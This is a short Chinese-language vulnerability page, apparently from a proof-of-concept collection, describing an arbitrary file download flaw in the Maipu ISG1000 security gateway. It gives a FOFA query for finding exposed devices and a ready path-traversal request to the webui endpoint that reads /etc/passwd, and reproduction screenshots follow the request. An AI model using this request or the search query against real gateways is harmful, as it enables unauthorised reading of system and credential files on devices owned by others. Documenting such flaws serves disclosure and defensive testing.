# 迈普 ISG1000安全网关 任意文件下载漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

迈普 ISG1000安全网关 存在任意文件下载漏洞，攻击者通过漏洞可以获取服务器任意文件

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

迈普 ISG1000安全网关

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

title="迈普通信技术股份有限公司"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

登录页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-MhrUg7TzxlqlHS6pCF6%2Fimage.png?alt=media\&token=b12ff5fd-889a-43eb-9cc7-8779f68966e6)

请求的 POC 为

```
/webui/?g=sys_dia_data_down&file_name=../etc/passwd
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-MhrUib1sI4Nn0icJkVM%2Fimage.png?alt=media\&token=c79ad093-89ed-414b-8e9b-86ddc63f356a)
